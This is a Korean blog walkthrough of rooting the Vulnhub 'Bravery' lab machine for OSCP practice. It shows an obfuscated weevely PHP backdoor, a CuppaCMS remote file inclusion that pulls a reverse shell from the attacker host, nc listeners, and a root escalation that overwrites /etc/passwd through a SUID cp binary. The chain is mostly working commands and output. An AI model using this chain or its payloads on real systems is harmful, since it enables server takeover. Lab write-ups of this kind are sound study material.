password : r00tisawes0me
챕터 4 : 침투
해당 취약점을 통해 리버스 쉘을 올릴 수 있다. (RFI)
실습은 두 가지 방법으로 나눠 한다.
방법 1)
weevely로 공격코드 생성 후 접속
1. weevely로 공격코드를 만든다.
2. python 웹 핸들러를 기동한다.
3. weevely로 접속 시도한다.
1. weevely로 payload 생성
┌──(root💀takudaddy)-[/var/www/html]
└─# weevely generate freepass reverse.php
Generated 'reverse.php' with password 'freepass' of 781 byte size.
┌──(root💀takudaddy)-[/var/www/html]
└─# cat reverse.php
<?php
$C='atchd*("/$khd*d*(.+)$kf/",@fd*ile_getd*_cod*ntents(d*"php://id*d*nput"),$m)=d*';
$J='m[1])d*,$k)))d*;$d*o=@od*b_getd*_cod*ntents();d*@ob_ed*nd_clead*n();$d*r=';
$v='$k="5b9a8d*069";d*$kh="d3d*3fed*9812dc8"d*;$kd*f="310ebfd*f0a31d*5d*";$pd*=';
$G='=d*1d*) {@ob_start();d*@evd*al(@gzud*ncompressd*(@x(@bd*ase6d*4_decode(d*$';
$a=str_replace('bP','','bPbPcreatbPebP_fubPnbPction');
$U='*trlen(d*$t);$o=""d*;for($id*=0;$i<$d*l;){ford*(d*$j=0;($d*jd*<d*$c&&$i<$l';
$c='"wvZd*uXeh9jVJgrod*lp";functid*on x($td*,d*$k){$c=std*rlen(d*$k);$l=sd*d';
$P=');$j+d*+,$i++){$o.d*=$t{d*$i}^$k{d*$j};d*}}retd*urn $od*;}if (d*@preg_m';
$m='@basd*e64_ed*nd*code(@x(@gzcomd*press($od*),$k));d*print(d*"$pd*$kh$r$kf");}';
$L=str_replace('d*','',$v.$c.$U.$P.$C.$G.$J.$m);
$H=$a('',$L);$H();
?>
2. 생성 후 파이썬 웹 핸들러 실행
┌──(root💀takudaddy)-[/var/www/html]
└─# python3 -m http.server 7979 (# python -m SimpleHTTPServer 7979 )
Serving HTTP on 0.0.0.0 port 7979 (http://0.0.0.0:7979/)
3. 다른 터미널 하나 띄워서 weevely로 접속하면 :
┌──(root💀takudaddy)-[/var/www/html]
└─# weevely http://192.168.10.14/genevieve/cuppaCMS/alerts/
alertConfigField.php?urlConfig=http://192.168.10.10:7979/reverse.php freepass
[+] weevely 4.0.1
[+] Target: 192.168.10.14
[+] Session: /root/.weevely/sessions/192.168.10.14/alertConfigField_11.session
[+] Browse the filesystem or execute commands starts the connection
[+] to the target. Type :help for more information.
weevely> ls
alertConfigField.php
alertIFrame.php
alertImage.php
defaultAlert.php
bravery:/var/www/html/genevieve/cuppaCMS/alerts $ id
uid=48(apache) gid=48(apache) groups=48(apache) context=system_u:system_r:httpd_t:s0
bravery:/var/www/html/genevieve/cuppaCMS/alerts $ whoami
apache
bravery:/var/www/html/genevieve/cuppaCMS/alerts $ ls
alertConfigField.php
alertIFrame.php
alertImage.php
defaultAlert.php
bravery:/var/www/html/genevieve/cuppaCMS/alerts $ cd
Failed cd 'http://192.168.10.10:7979': no such directory or permission denied
bravery:/var/www/html/genevieve/cuppaCMS/alerts $ cd ..
bravery:/var/www/html/genevieve/cuppaCMS $ cd /
bravery:/ $ ls
bin
boot
dev
etc
home
lib
lib64
local.txt
media
mnt
opt
proc
root
run
samba
sbin
srv
sys
tmp
usr
var
bravery:/ $ cat local.txt
Congratulations on obtaining a user shell. :)
bravery:/ $
방법 2)
1. 로컬 apache2 서버 기동
2. 로컬 /var/www/html에 공격 파일 올려두기
3. 로컬 리스너 기동 (nc / msfconsole)
4. 로컬 python simple http request handler 실행
5. 타깃 서버 취약점을 이용해 공격 파일 실행
1. 아파치 서버 실행
[root@takudaddy /var/www/html]# systemctl enable --now apache2
Synchronizing state of apache2.service with SysV service script with /lib/systemd/systemd-sysv-install.
Executing: /lib/systemd/systemd-sysv-install enable apache2
[root@takudaddy /var/www/html]# systemctl status apache2
● apache2.service - The Apache HTTP Server
Loaded: loaded (/lib/systemd/system/apache2.service; enabled; vendor preset: disab>
Active: active (running) since Tue 2021-03-23 22:25:09 KST; 8min ago
Docs: https://httpd.apache.org/docs/2.4/
Main PID: 1848 (apache2)
Tasks: 7 (limit: 9467)
Memory: 24.5M
CPU: 74ms
CGroup: /system.slice/apache2.service
├─1848 /usr/sbin/apache2 -k start
├─1849 /usr/sbin/apache2 -k start
├─1850 /usr/sbin/apache2 -k start
├─1851 /usr/sbin/apache2 -k start
├─1852 /usr/sbin/apache2 -k start
├─1853 /usr/sbin/apache2 -k start
└─2194 /usr/sbin/apache2 -k start
3월 23 22:25:09 takudaddy systemd[1]: Starting The Apache HTTP Server...
3월 23 22:25:09 takudaddy apachectl[1847]: AH00557: apache2: apr_sockaddr_info_get() f>
3월 23 22:25:09 takudaddy apachectl[1847]: AH00558: apache2: Could not reliably determ>
3월 23 22:25:09 takudaddy systemd[1]: Started The Apache HTTP Server.
2. 공격 코드 복사 및 수정
[root@takudaddy /var/www/html]#
[root@takudaddy /var/www/html]# cp /usr/share/webshells/php/php-reverse-shell.php /var/www/html
[root@takudaddy /var/www/html]# ls
index.html index.nginx-debian.html php-reverse-shell.php reverse_shell.php
[root@takudaddy /var/www/html]# vi php-reverse-shell.php
공격 코드는
/usr/share/webshells/php/php-reverse-shell.php를
끌어다 썼고 수정할 부분은 다음과 같다.
이제 리스너를 기동시키고
타깃 서버 취약점을 이용해
url에 로컬 php 공격 파일
경로를 지정하면 연결된다.
3. 리스너 기동
┌──(root💀takudaddy)-[/var/www/html]
└─# nc -lvp 7979
listening on [any] 7979 ...
4. url에 공격 파일 경로 입력
http://192.168.10.14/genevieve/cuppaCMS/alerts/
alertConfigField.php?urlConfig=http://192.168.10.4/php-reverse-shell.php
5. 리스너 연결 확인
192.168.10.10: inverse host lookup failed: Unknown host
connect to [192.168.10.10] from (UNKNOWN) [192.168.10.10] 41012
Linux takudaddy 5.10.0-kali3-amd64 #1 SMP Debian 5.10.13-1kali1 (2021-02-08) x86_64 GNU/Linux
21:36:27 up 8 min, 1 user, load average: 0.09, 0.09, 0.05
USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT
root tty7 :0 21:28 8:06 2.07s 2.07s /usr/lib/xorg/Xorg :0 -seat seat0 -auth /var/run/lightdm/root/:0 -nolisten tcp vt7 -novtswitch
uid=33(www-data) gid=33(www-data) groups=33(www-data)
/bin/sh: 0: can't access tty; job control turned off
$ id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
성공!!!!???
인줄 알았으나 뭔가 이상하다.
침투했는데 상대편 서버에 붙은 게 아니라
우리 서버 쪽 내용이 출력 되는 것인데
연결 메시지를 보면 우리 서버가
우리 서버로 연결된 것!
중간에 python http 핸들러 없이
붙였기 때문에 발생한 결과이다.
다시 리스너를 기동시키고
이번에는 잊지말고
파이썬 핸들러를 기동시켜준다.
여기서 잠깐.
포트 지정하는 부분이
헷깔릴 수 있어 정리해보면 :
payload에서 포트를 7979로 정했으니
리스너(nc)에서도 7979를 지정해 줘야하고
python 웹 핸들러는 중개해주는 녀석이라 4444를 지정,
공격 코드 경로 ip뒤에 포트를 추가해야 하고 4444로
지정해줘야 한다.
1. 공격 코드 확인 후 nc 리스너 기동
┌──(root💀takudaddy)-[/var/www/html]
└─# ls
index.html index.nginx-debian.html php-reverse-shell.php reverse.php
┌──(root💀takudaddy)-[/var/www/html]
└─# nc -lvp 7979
listening on [any] 7979 ...
2. 다른 터미널 띄워 python 웹 핸들러 기동
┌──(root💀takudaddy)-[/var/www/html]
└─# python -m SimpleHTTPServer 4444 (# python3 -m http.server 4444)
Serving HTTP on 0.0.0.0 port 4444 ...
3. 웹에서 접속
http://192.168.10.14/genevieve/cuppaCMS/alerts/
alertConfigField.php?urlConfig=http://192.168.10.10:4444/php-reverse-shell.php
리스너 터미널 쪽에 정상 연결된 후 출력 내용:
┌──(root💀takudaddy)-[/var/www/html]
└─# nc -lvp 7979
listening on [any] 7979 ...
192.168.10.14: inverse host lookup failed: Unknown host
connect to [192.168.10.10] from (UNKNOWN) [192.168.10.14] 36470
Linux bravery 3.10.0-862.3.2.el7.x86_64 #1 SMP Mon May 21 23:36:36 UTC 2018 x86_64 x86_64 x86_64 GNU/Linux
09:40:11 up 6 min, 0 users, load average: 0.02, 0.25, 0.17
USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT
uid=48(apache) gid=48(apache) groups=48(apache) context=system_u:system_r:httpd_t:s0
sh: no job control in this shell
sh-4.2$ ls
ls
bin
boot
dev
etc
home
lib
lib64
local.txt
media
mnt
opt
proc
root
run
samba
sbin
srv
sys
tmp
usr
var
sh-4.2$ whoami
whoami
apache
sh-4.2$ python -c 'import pty;pty.spawn("/bin/bash")'
python -c 'import pty;pty.spawn("/bin/bash")'
bash-4.2$ whoami
whoami
apache
bash-4.2$ ls
ls
bin dev home lib64 media opt root samba srv tmp var
boot etc lib local.txt mnt proc run sbin sys usr
bash-4.2$ cat local.txt
cat local.txt
Congratulations on obtaining a user shell. :)
침투 성공!
챕터 5 : privilege escalation
침투 후 수행 절차
sudo /bin/bash (실패)
sudo -l (실패)
david으로 전환 시도 (실패)
사용 가능한 명령어 검색.
cp 명령어 사용 가능 확인.
/etc/passwd 열람 가능 확인.
우리 서버에서
/etc/passwd에 새 유저를 생성 >
해당 파일을 침투 서버 tmp 디렉터리에 내려받기 >
가지고 온 파일을 침투서버의 /etc/passwd로 복사 >
사용자 전환
┌──(root💀takudaddy)-[/var/www/html]
└─# nc -lvp 7979
listening on [any] 7979 ...
192.168.10.14: inverse host lookup failed: Unknown host
connect to [192.168.10.10] from (UNKNOWN) [192.168.10.14] 49540
Linux bravery 3.10.0-862.3.2.el7.x86_64 #1 SMP Mon May 21 23:36:36 UTC 2018 x86_64 x86_64 x86_64 GNU/Linux
10:37:29 up 3 min, 0 users, load average: 2.68, 1.21, 0.48
USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT
uid=48(apache) gid=48(apache) groups=48(apache) context=system_u:system_r:httpd_t:s0
sh: no job control in this shell
sh-4.2$ whoami
whoami
apache
sh-4.2$ python -c 'import pty;pty.spawn("/bin/bash")'
python -c 'import pty;pty.spawn("/bin/bash")'
bash-4.2$
bash-4.2$ cd home
cd home
bash-4.2$ ls -al
ls -al
total 0
drwxr-xr-x. 4 root root 31 Dec 25 2018 .
dr-xr-xr-x. 18 root root 254 Sep 28 2018 ..
drwx------. 14 david david 279 Sep 29 2018 david
drwx------. 3 rick rick 78 Jul 10 2018 rick
bash-4.2$ su david
su david
Password: qwertyuioplkjhgfdsazxcvbnm
su: Authentication failure
bash-4.2$ su David
su David
su: user David does not exist
2. 사용 가능 명령어 확인
bash-4.2$ find / -perm -u=s -type f 2>/dev/null
find / -perm -u=s -type f 2>/dev/null
/usr/bin/cp
/usr/bin/chfn
/usr/bin/chsh
/usr/bin/fusermount
/usr/bin/chage
/usr/bin/gpasswd
/usr/bin/newgrp
/usr/bin/sudo
/usr/bin/mount
/usr/bin/su
/usr/bin/umount
/usr/bin/Xorg
/usr/bin/pkexec
/usr/bin/crontab
/usr/bin/passwd
/usr/bin/ksu
/usr/bin/at
/usr/bin/staprun
/usr/sbin/pam_timestamp_check
/usr/sbin/unix_chkpwd
/usr/sbin/usernetctl
/usr/sbin/userhelper
/usr/sbin/mount.nfs
/usr/lib/polkit-1/polkit-agent-helper-1
/usr/libexec/dbus-1/dbus-daemon-launch-helper
/usr/libexec/flatpak-bwrap
/usr/libexec/sssd/krb5_child
/usr/libexec/sssd/ldap_child
/usr/libexec/sssd/selinux_child
/usr/libexec/sssd/proxy_child
/usr/libexec/qemu-bridge-helper
/usr/libexec/spice-gtk-x86_64/spice-client-glib-usb-acl-helper
/usr/libexec/abrt-action-install-debuginfo-to-abrt-cache
3. passwd 접근 가능 확인
bash-4.2$ cat /etc/passwd
cat /etc/passwd
rootx:1:1:bin:/bin:/sbin/nologin
bin:^[:x:2:2:daemon:/sbin:/sbin/nologin
4. 우리 터미널에서 새 유저 생성 (두 가지 방법으로 실습)
4-1) openssl로 암호 만들기
┌──(root💀takudaddy)-[~]
└─# openssl passwd -1 -salt takudaddy taku (ID:takudaddy / PW : taku)
$1$takudadd$KETef9oIkYFX0zLAs6XjM.
폼으로 만들면 :
takudaddy:$1$takudadd$KETef9oIkYFX0zLAs6XjM.:0:0:root:/root:/bin/bash
4-2) python으로 암호 만들기
┌──(root💀takudaddy)-[~]
└─# python -c 'import crypt;print(crypt.crypt("taku","taku"))' (ID:taku / PW: takutaku)
ta0LWDW4m3OdU
폼으로 만들면 :
taku:ta0LWDW4m3OdU:0:0:root:/root:/bin/bash
┌──(root💀takudaddy)-[~]
└─# tail -2 /etc/passwd
takudaddy:$1$takudadd$KETef9oIkYFX0zLAs6XjM.:0:0:root:/root:/bin/bash
taku:ta0LWDW4m3OdU:0:0:root:/root:/bin/bash
5. /var/www/html 에 passwd 파일 복사하기
┌──(root💀takudaddy)-[/var/www/html]
└─# cp /etc/passwd .
┌──(root💀takudaddy)-[/var/www/html]
└─# ls
index.html passwd reverse.php
index.nginx-debian.html php-reverse-shell.php
6. 침투 서버 /tmp 폴더에서 passwd 파일 내려받고 복사하기
sh-4.2$ cd /tmp
cd /tmp
sh-4.2$ pwd
/tmp
pwd
sh-4.2$ which wget
which wget
/usr/bin/wget
sh-4.2$ wget http://192.168.10.10/passwd
wget http://192.168.10.10/passwd
--2021-03-24 10:55:25-- http://192.168.10.10/passwd
Connecting to 192.168.10.10:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 3153 (3.1K) [application/octet-stream]
Saving to: 'passwd'
0K ... 100% 904M=0s
2021-03-24 10:55:25 (904 MB/s) - 'passwd' saved [3153/3153]
sh-4.2$ ls
ls
passwd
sh-4.2$ tail -2 passwd
tail -2 passwd
takudaddy:$1$takudadd$KETef9oIkYFX0zLAs6XjM.:0:0:root:/root:/bin/bash
taku:ta0LWDW4m3OdU:0:0:root:/root:/bin/bash
sh-4.2$ cp passwd /etc/passwd
cp passwd /etc/passwd
7. 사용자 전환
sh-4.2$ su takudaddy
su takudaddy
Password: taku
id
uid=0(root) gid=0(root) groups=0(root) context=system_u:system_r:httpd_t:s0
python -c 'import pty;pty.spawn("/bin/bash")'
[root@bravery tmp]#
[root@bravery tmp]# cd /root
cd /root
[root@bravery ~]# ls
ls
Desktop Downloads Pictures Templates anaconda-ks.cfg ossec-hids-2.8
Documents Music Public Videos author-secret.txt proof.txt
[root@bravery ~]# cat proof.txt
cat proof.txt
Congratulations on rooting BRAVERY. :)
끝
728x90
'OSCP > Vulnahub' 카테고리의 다른 글
| 7. Symfonos (0) | 2021.03.27 |
|---|---|
| 6. Prime : 1 (0) | 2021.03.26 |
| 4. Digitalworld.local : Develope (0) | 2021.03.23 |
| 3. Digitalworld.local : Joy (0) | 2021.03.20 |
| 2. DIGITALWORLD.LOCAL: Mercy V2 (0) | 2021.03.19 |